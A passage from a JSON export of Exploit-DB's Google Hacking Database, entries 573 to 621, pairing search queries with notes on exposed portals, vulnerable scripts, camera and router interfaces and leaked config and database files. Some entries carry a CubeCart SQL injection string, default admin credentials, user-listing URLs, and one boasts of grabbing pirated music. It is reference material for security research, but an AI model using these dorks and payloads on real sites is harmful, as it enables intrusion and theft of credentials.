"https://www.exploit-db.com/ghdb/573/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22Installed+Objects+Scanner%22+inurl%3Adefault.asp++&btnG=Search", "shortDescription": "\"Installed Objects Scanner\" inurl:default.asp", "textualDescription": "Installed Objects Scanner makes it easy to test your IIS Webserver for installed components. Installed Objects Scanner also has descriptions and links for many components to let you know more on how using those components. Just place the script on your server and view it in your browser to check your server for all currently known components." }, { "signatureReferenceNumber": "574", "link": "https://www.exploit-db.com/ghdb/574/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%0Aintitle%3A%22remote+assessment%22+OpenAanval+Console", "shortDescription": "intitle:\"remote assessment\" OpenAanval Console", "textualDescription": "The Aanval Intrusion Detection Console is an advanced intrusion detection monitor and alerting system. Currently supporting modules for Snort and syslog - Aanval provides real-time monitoring, reporting, alerting and stability. Aanval's web-browser interface provides real-time event viewing and system/sensor management." }, { "signatureReferenceNumber": "575", "link": "https://www.exploit-db.com/ghdb/575/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&q=ext%3Aini+intext%3Aenv.ini&btnG=Search", "shortDescription": "ext:ini intext:env.ini", "textualDescription": "This one shows configuration files for various applications. based on the application an attacker may find information like passwords, ipaddresses and more." }, { "signatureReferenceNumber": "576", "link": "https://www.exploit-db.com/ghdb/576/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=ezBOO+%22%3E%3E+Administrator+Panel+%3C%3C%22+-cvs&hl=en&lr=&start=10&sa=N", "shortDescription": "ezBOO \"Administrator Panel\" -cvs", "textualDescription": "ezBOO WebStats is a high level statistical tool for web sites monitoring. It allows real time access monitoring on several sites. Based on php and mySQL it is easy to install and customization is made easy. It works on Unix, Linux and Windows" }, { "signatureReferenceNumber": "577", "link": "https://www.exploit-db.com/ghdb/577/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22This+page+has+been+automatically+generated+by+Plesk+Server+Administrator%22&btnG=B%C3%BAsqueda&meta=", "shortDescription": "\"This page has been automatically generated by Plesk Server Administrator\"", "textualDescription": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP. Due to an input validation error in Plesk Server Administrator, it is possible for a remote attacker to make a specially crafted web request which will display PHP source code. This is acheivable by connecting to a host (using the IP address rather than the domain name), and submitting a request for a known PHP file along with a valid username. http://www.securityfocus.com/bid/3737" }, { "signatureReferenceNumber": "578", "link": "https://www.exploit-db.com/ghdb/578/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22The+script+whose+uid+is+%22+%22is+not+allowed+to+access%22&btnG=Search&hl=en&lr=&client=firefox-a", "shortDescription": "\"The script whose uid is \" \"is not allowed to access\"", "textualDescription": "This PHP error message is revealing the webserver's directory and user ID." }, { "signatureReferenceNumber": "579", "link": "https://www.exploit-db.com/ghdb/579/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=filetype%3Aphp+inurl%3Anqt+intext%3A%22Network+Query+Tool%22+&btnG=Search", "shortDescription": "filetype:php inurl:nqt intext:\"Network Query Tool\"", "textualDescription": "Network Query Tool enables any Internet user to scan network information using:* Resolve/Reverse Lookup* Get DNS Records* Whois (Web)* Whois (IP owner)* Check port (!!!)* Ping host* Traceroute to host* Do it allThe author has been informed that the nqt form also accepts input from cross site pages, but he will not fix it.A smart programmer could use the port scan feature and probe al the nmap services ports. Though this would be slow, but it provides a higher degree of anonymity, especially if the attacker is using a proxy or an Internet Cafe host to access the NQT pages.It gets even worse .. an attacker can scan the *internal* hosts of the networks that host NQT in many cases. Very dangerous.PS: this vulnerability was found early this year (search google for the full report), but was never added to the GHDB for some reason." }, { "signatureReferenceNumber": "580", "link": "https://www.exploit-db.com/ghdb/580/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl%3ATiVoConnect%3FCommand%3DQueryServer", "shortDescription": "inurl:TiVoConnect?Command=QueryServer", "textualDescription": "Tivo is a the digital replacement for your analog videorecorder. It's a digital media system that amongst other things allows recording tv shows to a hard disk. More information is available at http://www.tivo.com.This search was found in one of those cgi scanning tools out there. Currently there are only two results and only the first responds with information like this:1.0Sat Oct 16 15:26:46 EDT 2004JavaHMO1.0Leon Nicholls-This is an official build. Identifier: 2003.03.25-1612 Last Change: 112792In the future vulnerabilities may be found in this software. For now an attacker can enjoy the mp3 stream it provides (copy the server:port in winamp or xmms)." }, { "signatureReferenceNumber": "581", "link": "https://www.exploit-db.com/ghdb/581/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=ext%3Amdb+inurl%3A*.mdb++inurl%3Afpdb+shop", "shortDescription": "ext:mdb inurl:*.mdb inurl:fpdb shop.mdb", "textualDescription": "The directory \"http:/xxx/fpdb/\" is the database folder used by some versions of FrontPage. It contains many types of Microsoft Access databases.One of them is Metacart, who used \"shop.mdb\" as their default name. It contains customer info like phone numbers but also plain text passwords. A screenshot is available at ImageShack: http://img49.exs.cx/img49/7673/shopmdb.jpgThree results only at time of writing. Remove the shop.mdb part to see the complete list of databases." }, { "signatureReferenceNumber": "582", "link": "https://www.exploit-db.com/ghdb/582/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=inurl%3Acgi-bin%2Ftestcgi.exe+%22Please+distribute+TestCGI%22", "shortDescription": "inurl:cgi-bin/testcgi.exe \"Please distribute TestCGI\"", "textualDescription": "Test CGI by Lilikoi Software aids in the installation of the Ceilidh discussion engine for the World Wide Web. An attacker can use this to gather information about the server like: Operating System, IP and the full docroot path." }, { "signatureReferenceNumber": "583", "link": "https://www.exploit-db.com/ghdb/583/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:ttt-webmaster.php&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "inurl:ttt-webmaster.php", "textualDescription": "Turbo traffic trader Nitro v1.0 is a free, fully automated traffic trading script. Multiple vulnerabilities were found.Vulnerability report: http://www.securityfocus.com/bid/11358Vendor site: http://www.turbotraffictrader.com/php" }, { "signatureReferenceNumber": "584", "link": "https://www.exploit-db.com/ghdb/584/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22DVR+Web+client%22&hl=en&lr=&ie=UTF-8&client=firefox-a&filter=0", "shortDescription": "intitle:\"DVR Web client\"", "textualDescription": "This embedded DVR is quick plug and play. Just plug it in and it will start recording. You can view all the cameras at once or one at a time. Allows individual pictures to come up on play back or all together. The best feature is the ability to connect via a network and play back existing stored video or view images live.* Four Channel Input* Horizontal Resolution 480 Lines* 16.7 Million Color Output* Display In Quad or Single Image (Full MultiPlex)* Motion Detection* Scheduling* Zoom in Live and Playback* 720H X 480V (Full) 360H X 240V In Quad* 0.1 FPS Thru 15 FPS each camera (60 FPS Total)* Web Interface TCP/IP With Client Software* Back-Up With Mark Image, VCR, Time Lapse, Remote Client Software* Full Remote Camera Controls (PTZ), Alarms, Wiper, Fans, Etc." }, { "signatureReferenceNumber": "585", "link": "https://www.exploit-db.com/ghdb/585/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=intitle:%22ASP+FileMan%22+Resend+-site:iisworks.com&num=100&hl=en&lr=&c2coff=1&safe=off&client=firefox-a&filter=0", "shortDescription": "intitle:\"ASP FileMan\" Resend -site:iisworks.com", "textualDescription": "FileMan is a corporate web based storage and file management solution for intra- and internet. It runs on Microsoft IIS webservers and is written in ASP. All user and group settings are stored in a MS Access or SQL database. Default user: user=admin, pass=passIn the default installation a diagnostigs page calleddiags.asp exists the manual recommends to delete it, but it can be found in some installs. The path to the database is also on the page. If the server is not configured correctly, the mdb file can be downloaded and the passwords are not encrypted.Site admins have been notified. As always: DO NOT ABUSE THIS." }, { "signatureReferenceNumber": "586", "link": "https://www.exploit-db.com/ghdb/586/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22index.of+*%22+admin+news.asp+configview.asp&btnG=Search", "shortDescription": "intitle:\"index.of *\" admin news.asp configview.asp", "textualDescription": "With Compulive News you can enter the details of your news items onto a webform and upload images through your browser. It integrates seamlessly within your website.When you open your CNU5 zip there is a news folder created with three subfolders: htmlarea, images and admin. In the news folder is your database file \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cnews.mdb\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2.For security purposes the manual recommends that you immediately rename this database to a name of your own choosing thereby making it harder for anyone to download your news database.The database contains the plain text password. PS: this search is based on the index.of method. There are other ways to find this software, but finding the news database becomes a lot more difficult for an attacker that way." }, { "signatureReferenceNumber": "587", "link": "https://www.exploit-db.com/ghdb/587/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Copyright+%C2%A9+2002+Agustin+Dondo+Scripts%22&btnG=Search", "shortDescription": "\"Copyright \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2002 Agustin Dondo Scripts\"", "textualDescription": "CoolPHP has multiple vulnerabilities:* Cross-Site Scripting vulnerability (index.php)* A Path Disclosure Vulnerability (index.php)* Local file include Vulnerability with Directory Traversal info: http://www.securityfocus.com/archive/1/378617" }, { "signatureReferenceNumber": "588", "link": "https://www.exploit-db.com/ghdb/588/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22IMail+Server+Web+Messaging%22+intitle:login&hl=en&lr=&filter=0", "shortDescription": "\"IMail Server Web Messaging\" intitle:login", "textualDescription": "IMail Server from Ipswitch is a messaging solution with 60 million users worldwide. It contains the features and safeguards you need without the complexity of expensive solutions like Microsoft Exchange\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae or groupware which challenges even the most experienced administrators.This is a login portal search. Security Focus shows a list of vulnerabilities about this software." }, { "signatureReferenceNumber": "589", "link": "https://www.exploit-db.com/ghdb/589/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Directory+Listing+For%22+intext%3ATomcat+-intitle%3ATomcat", "shortDescription": "intitle:\"Directory Listing For\" intext:Tomcat -intitle:Tomcat", "textualDescription": "The Google Hackers Guide explains how to find Apache directory indexes, which are the most common found on the Internet. There are other ways however.This query is a generic search for servers using Tomcat with directory listings enabled. They are a bit more fancy than Apache's default lists and more importantly they will not be found using \"index.of\"." }, { "signatureReferenceNumber": "590", "link": "https://www.exploit-db.com/ghdb/590/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=site%3A.viewnetcam.com+-www.viewnetcam.com", "shortDescription": "site:.viewnetcam.com -www.viewnetcam.com", "textualDescription": "The FREE viewnetcam.com service allows you to create a personal web address (e.g., http://bob.viewnetcam.com) at which your camera's live image can be found on the Internet. How the camera and service works: Special Software embedded within your Panasonic Network Camera gives your camera the ability to locate your unique Internet address. No matter what kind of Internet connection you have or which Internet provider you use, the viewnetcam.com service will keep your camera's Internet address permanent." }, { "signatureReferenceNumber": "591", "link": "https://www.exploit-db.com/ghdb/591/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%2Fcgi-bin%2Ffinger%3F+Enter+%28account%7Chost%7Cuser%7Cusername%29+&btnG=Google+Search", "shortDescription": "inurl:/cgi-bin/finger? Enter (account|host|user|username)", "textualDescription": "The finger command on unix displays information about the system users. This search displays the webinterface for that command." }, { "signatureReferenceNumber": "592", "link": "https://www.exploit-db.com/ghdb/592/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl:/cgi-bin/finger%3F+%22In+real+life%22&num=100&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "inurl:/cgi-bin/finger? \"In real life\"", "textualDescription": "The finger command on unix displays information about the system users. This search displays pre-fingered users, so an attacker wouldn't even have to guess their accounts." }, { "signatureReferenceNumber": "593", "link": "https://www.exploit-db.com/ghdb/593/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3A%22calendar.asp%3Faction%3Dlogin%22+&btnG=Search", "shortDescription": "inurl:\"calendar.asp?action=login\"", "textualDescription": "aspWebCalendar is a browser based software package that runs over a standard web browser, such as Internet Explorer from Microsoft, and allows an organization of any size to easily and cost effectively provide personal and group calendar functions to everyone in the organization.A vulnerability has been found for the (SQL version) script family from Full Revolution. Affected software is: aspWebAlbum, aspWebCalendar, aspWebHeadlines, aspWebMail. You can check it here: http://www.securityfocus.com/bid/11246Searches for aspWebAlbum and aspWebHeadlines:inurl:\"album.asp?action=login\"inurl:\"news.asp?action=login\"" }, { "signatureReferenceNumber": "594", "link": "https://www.exploit-db.com/ghdb/594/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Powered+by+CubeCart%22&btnG=Search", "shortDescription": "\"Powered by CubeCart\"", "textualDescription": "--------------------------------------------------------Full path disclosure and sql injection on CubeCart 2.0.1--------------------------------------------------------[1]Introduction[2]The Problem[3]The Solution[4]Timeline[5]Feddback##############################################################[1]Introduction\"CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as youhave hosting supporting PHP and one MySQL database.\"This info was taken from hxxp://www.cubecart.comCubeCart, from Brooky (hxxp://www.brooky.com), is a software formerly known as eStore.[2]The ProblemA remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying thesoftware's full installation path. It can also be used to inject sql commands. Examples follow:(a) http://example.com/store/index.php?cat_id='causes an error like this:\"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/link_navi.php on line 35Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 170Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/home/example/public_html/store/index.php on line 172\"(b) http://example.com/store/index.php?cat_id=1 or 1=1--displays all categories in the database[3]The SolutionNone at this time.Vendor contacted and fix will be avaliable soon.[4]Timeline(2/10/2004) Vulnerability discovered(2/10/2004) Vendor notified(3/10/2004) Vendor response[5]FeedbackComments and stuff to cybercide@megamail.pt" }, { "signatureReferenceNumber": "595", "link": "https://www.exploit-db.com/ghdb/595/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=inurl%3Aconfixx+inurl%3Alogin%7Canmeldung&btnG=Search", "shortDescription": "inurl:confixx inurl:login|anmeldung", "textualDescription": "Confixx is a webhosting management tool and has the following features: * create resellers, * edit personal data, * manage newsletters to resellers, * comprehensive stats, * powerful evaluation of traffic, * manage e-mail templates, * lock resellers. security focus has a vulnerability report on this.vendor: http://www.sw-soft.com/en/products/confixx/" }, { "signatureReferenceNumber": "596", "link": "https://www.exploit-db.com/ghdb/596/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22VHCS+Pro+++ver%22+-demo&num=100&hl=en&lr=&newwindow=1&c2coff=1&safe=off&filter=0", "shortDescription": "\"VHCS Pro ver\" -demo", "textualDescription": "VHCS is professional Control Panel Software for Shared, Reseller, vServer and Dedicated Servers.No vulnerabilities are reported to security focus." }, { "signatureReferenceNumber": "597", "link": "https://www.exploit-db.com/ghdb/597/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22Virtual+Server+Administration+System%22", "shortDescription": "intitle:\"Virtual Server Administration System\"", "textualDescription": "VISAS, German control panel software like confixx.No vulnerabilities are reported to security focus." }, { "signatureReferenceNumber": "598", "link": "https://www.exploit-db.com/ghdb/598/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22SysCP+-+login%22", "shortDescription": "\"SysCP - login\"", "textualDescription": "sysCP: Open Source server management tool for Debian LinuxNo vulnerabilities are reported to security focus." }, { "signatureReferenceNumber": "599", "link": "https://www.exploit-db.com/ghdb/599/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22ISPMan+%3A+Unauthorized+Access+prohibited%22&btnG=Search", "shortDescription": "intitle:\"ISPMan : Unauthorized Access prohibited\"", "textualDescription": "ISPMan is a distributed system to manage components of ISP from a central management interface.No vulnerabilities are reported to security focus." }, { "signatureReferenceNumber": "600", "link": "https://www.exploit-db.com/ghdb/600/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22Login+-+Sun+Cobalt+RaQ%22", "shortDescription": "\"Login - Sun Cobalt RaQ\"", "textualDescription": "The famous Sun linux appliance. Nice clean portal search.Various vulnerabilities are reported to security focus." }, { "signatureReferenceNumber": "601", "link": "https://www.exploit-db.com/ghdb/601/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=%22OPENSRS+Domain+Management%22+inurl%3Amanage.cgi", "shortDescription": "\"OPENSRS Domain Management\" inurl:manage.cgi", "textualDescription": "OpenSRS Domain Management SystemNo vulnerabilities are reported to security focus." }, { "signatureReferenceNumber": "602", "link": "https://www.exploit-db.com/ghdb/602/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3Aplesk+inurl%3Alogin.php3", "shortDescription": "intitle:plesk inurl:login.php3", "textualDescription": "Plesk is server management software developed for the Hosting Service Industry. Various vulnerabilities are reported to security focus." }, { "signatureReferenceNumber": "603", "link": "https://www.exploit-db.com/ghdb/603/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:%22level/15/exec/-/show%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "inurl:\"level/15/exec/-/show\"", "textualDescription": "This search finds Cisco devices which have level 15 access open via webinterface. If an attacker wants to search for another level he can replace the \"15\" with this level. Levels below 10 need a leading zero (e.g. 04).Currently only the cached pages can be viewed." }, { "signatureReferenceNumber": "604", "link": "https://www.exploit-db.com/ghdb/604/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3A%2Fdana-na%2Fauth%2Fwelcome.html&btnG=Search&X=1&filter=0", "shortDescription": "inurl:/dana-na/auth/welcome.html", "textualDescription": "Neoteris Instant Virtual Extranet (IVE) has been reported prone to a cross-site scripting vulnerability.The issue presents itself, due to a lack of sufficient sanitization performed on an argument passed to an IVE CGI script. An attacker may exploit this vulnerability to hijack valid Neoteris IVE sessions.advisories: http://secunia.com/product/1558/http://www.securityfocus.com/bid/7510" }, { "signatureReferenceNumber": "605", "link": "https://www.exploit-db.com/ghdb/605/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=ext%3Ansf+nsf+-gov+-mil", "shortDescription": "ext:nsf nsf -gov -mil", "textualDescription": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet.This is a generic search for Lotus Domino files. It identifies Domino users. Search the GBDB for more variations on this theme." }, { "signatureReferenceNumber": "606", "link": "https://www.exploit-db.com/ghdb/606/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Astatrep.nsf+-gov", "shortDescription": "inurl:statrep.nsf -gov", "textualDescription": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds statistics pages generated by Domino. Information on these pages includes Operating System, Disk space, Usernames and full path disclosure.Example: * 1. Statistics Reports - 1. System * 1. Statistics Reports - 2. Mail & Database * 1. Statistics Reports - 3. Communications * 1. Statistics Reports - 4. Network * 1. Statistics Reports - 5. Clusters * 1. Statistics Reports - 6. Web Server & Retriever * 1. Statistics Reports - 7. Calendaring Scheduling * 2. Alarms * 3. Events * 4. Spreadsheet Export * 5. Graphs - 1. System Statistics * 5. Graphs - 2. System Loads * 5. Graphs - 3. System Resources * 6. Trouble Tickets - 1. Alarm * 6. Trouble Tickets - 2. Event * 7. Analysis Report * 8. File Statistics * 9. Single Copy Object Store Statistics" }, { "signatureReferenceNumber": "607", "link": "https://www.exploit-db.com/ghdb/607/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Alog.nsf+-gov", "shortDescription": "inurl:log.nsf -gov", "textualDescription": "Domino is server technology which transforms Lotus Notes\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae into an Internet applications server. Domino brings together the open networking environment of Internet standards and protocols with the powerful application development facilities of Notes, providing you with the ability to rapidly develop a broad range of business applications for the Internet and Intranet. This search finds Domino log files. These can be revealing, including information about dbconnect.nsf files, path information, etc.Example: * Database-Sizes * Database-Usage * Mail Routing Events * Miscellaneous Events * NNTP Events * Object Store Usage * Passthru Connections * Phone Calls-By Date * Phone Calls-By User * Replication Events * Sample Billing * Usage-By Date * Usage-By UserExample:2004/04/14 07:51:00 AM ATTEMPT TO ACCESS DATABASE mtstore.ntf by itisdom/ITIS/ITRI was denied" }, { "signatureReferenceNumber": "608", "link": "https://www.exploit-db.com/ghdb/608/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&client=firefox-a&q=inurl%3Alogin.php+%22SquirrelMail+version%22&btnG=Search", "shortDescription": "inurl:login.php \"SquirrelMail version\"", "textualDescription": "squirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation." }, { "signatureReferenceNumber": "609", "link": "https://www.exploit-db.com/ghdb/609/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=%22Ideal+BB+Version%3A+0.1%22+-idealbb.com&btnG=Google-Suche&meta=", "shortDescription": "\"Ideal BB Version: 0.1\" -idealbb.com", "textualDescription": "Ideal BB has been a popular choice for powering web based bulletin boards and we are now proud to introduce our next generation bulletin board Ideal BB.NET. Ideal Science IdealBB is reported prone to multiple unspecified input validation vulnerabilities. These issues result from insufficient sanitization of user-supplied data. Securityfocus currently has 3 reports idealBB." }, { "signatureReferenceNumber": "610", "link": "https://www.exploit-db.com/ghdb/610/", "category": "Footholds", "querystring": "http://www.google.com/search?hl=en&lr=&client=firefox-a&q=%28inurl%3A81%2Fcgi-bin%2F.cobalt%2F%29++%7C+%28intext%3A%22Welcome+to+the+Cobalt+RaQ%22+%29&btnG=Search", "shortDescription": "(inurl:81/cgi-bin/.cobalt/) | (intext:\"Welcome to the Cobalt RaQ\")", "textualDescription": "The famous Sun linux appliance. The default page displays this text:\"Congratulations on Choosing a Cobalt RaQ - the premier server appliance platform for web hosting. This page can easily be replaced with your own page. To replace this page, transfer your new content to the directory /home/sites/home/web\"." }, { "signatureReferenceNumber": "611", "link": "https://www.exploit-db.com/ghdb/611/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+YaPig+V0.92b%22&btnG=Google+Search", "shortDescription": "\"Powered by YaPig V0.92b\"", "textualDescription": "YaPiG is reported to contain an HTML injection vulnerability. The problem is reported to present itself due to a lack of sanitization performed on certain field data.This may allow an attacker to inject malicious HTML and script code into the application.http://www.securityfocus.com/bid/11452" }, { "signatureReferenceNumber": "612", "link": "https://www.exploit-db.com/ghdb/612/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22toshiba+network+camera+-+User+Login%22&btnG=Suche&meta=", "shortDescription": "intitle:\"toshiba network camera - User Login\"", "textualDescription": "Web interface of Toshiba network cameras." }, { "signatureReferenceNumber": "613", "link": "https://www.exploit-db.com/ghdb/613/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3A%22%2Fsite%2Farticles.asp%3Fidcategory%3D%22+&btnG=Google-Suche&meta=", "shortDescription": "inurl:\"/site/articles.asp?idcategory=\"", "textualDescription": "Dwc_Articles is an ASP application designed to add Featured, Recent and Popular News through an easy to use administration area. Other features: Design Packages, Add, Modify, Deactive through HTML/Wysiwyg Editor, Nearly all scripts suffer from possible sql injections. http://www.securityfocus.com/bid/11509" }, { "signatureReferenceNumber": "614", "link": "https://www.exploit-db.com/ghdb/614/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=index.of.dcim&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8", "shortDescription": "index.of.dcim", "textualDescription": "The DCIM directory is the default name for a few brands of digital camers. This is not a big network security risk, but like netcams it can reveal juicy details if found on corporate intranets." }, { "signatureReferenceNumber": "615", "link": "https://www.exploit-db.com/ghdb/615/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=intitle%3A%22phpremoteview%22+filetype%3Aphp+%22Name%2C+Size%2C+Type%2C+Modify%22", "shortDescription": "intitle:\"phpremoteview\" filetype:php \"Name, Size, Type, Modify\"", "textualDescription": "phpRemoteView is webbased filemanger with a basic shell. With this an attacker can browse the server filesystem use the online php interpreter.vendor: http://php.spb.ru/remview/ (russian)" }, { "signatureReferenceNumber": "616", "link": "https://www.exploit-db.com/ghdb/616/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle%3A%22index+of%22+-inurl%3Ahtm+-inurl%3Ahtml+mp3", "shortDescription": "intitle:\"index of\" -inurl:htm -inurl:html mp3", "textualDescription": "Yes! I probably have should have told you guys earlier, but this is how ive been getting 100% of my mp3s. It fricken rocks, use it and abuse it. Downfalls to it... a)sometimes you shouldnt include mp3 in the query and getting what you want takes several different methods of searching b)a lot of the time google gives you results and they are not there thanks to good old friend 404 c)finding stuff takes a lot of practice. Goods... a)ive found whole albums b)ive mass downloaded directories of hundreds of songs that i have intrest in c)its exciting seeing the results, like fining treasure." }, { "signatureReferenceNumber": "617", "link": "https://www.exploit-db.com/ghdb/617/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22Index+of%22+upload+size+parent+directory", "shortDescription": "intitle:\"Index of\" upload size parent directory", "textualDescription": "Files uploaded through ftp by other people, sometimes you can find all sorts of things from movies to important stuff." }, { "signatureReferenceNumber": "618", "link": "https://www.exploit-db.com/ghdb/618/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=filetype%3Acgi+inurl%3Anbmember.cgi&btnG=Search", "shortDescription": "filetype:cgi inurl:nbmember.cgi", "textualDescription": "vulnerable Netbilling nbmember.cgiNetbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.The following proof of concept is available:http://www.example.com/cgi-bin/nbmember.cgi?cmd=testhttp://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeywordhttp://www.securityfocus.com/bid/11504" }, { "signatureReferenceNumber": "619", "link": "https://www.exploit-db.com/ghdb/619/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+Coppermine+Photo+Gallery%22+&btnG=Google+Search", "shortDescription": "\"Powered by Coppermine Photo Gallery\"", "textualDescription": "published Oct 20, 2004, updated Oct 20, 2004vulnerable:Coppermine Photo Gallery Coppermine Photo Gallery 1.0Coppermine Photo Gallery Coppermine Photo Gallery 1.1Coppermine Photo Gallery Coppermine Photo Gallery 1.2Coppermine Photo Gallery Coppermine Photo Gallery 1.2.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3Coppermine Photo Gallery Coppermine Photo Gallery 1.3.1Coppermine Photo Gallery Coppermine Photo Gallery 1.3.2Coppermine Photo Gallery is reported prone to a design error that may allow users to cast multiple votes for a picture.All versions of Coppermine Photo Gallery are considered vulnerable at the moment.http://www.securityfocus.com/bid/11485" }, { "signatureReferenceNumber": "620", "link": "https://www.exploit-db.com/ghdb/620/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+WowBB%22+-site%3Awowbb.com+&btnG=Google+Search", "shortDescription": "\"Powered by WowBB\" -site:wowbb.com", "textualDescription": "WowBB is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamic web content and SQL database queries.An attacker can leverage these issues to manipulate or reveal database contents through SQL injection attacks as well as carry out other attacks and steal cookie-based authentication credentials through cross-site scripting attacks.http://www.securityfocus.com/bid/11429http://www.wowbb.com/" }, { "signatureReferenceNumber": "621", "link": "https://www.exploit-db.com/ghdb/621/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+ocPortal%22+-demo+-ocportal.com+&btnG=Google+Search", "shortDescription": "\"Powered by ocPortal\" -demo -ocportal.com", "textualDescription": "Reportedly ocPortal is affected by a remote file include vulnerability. This issue is due to a failure of the application to sanitize user supplied URI input.An attacker might leverage this issue to run 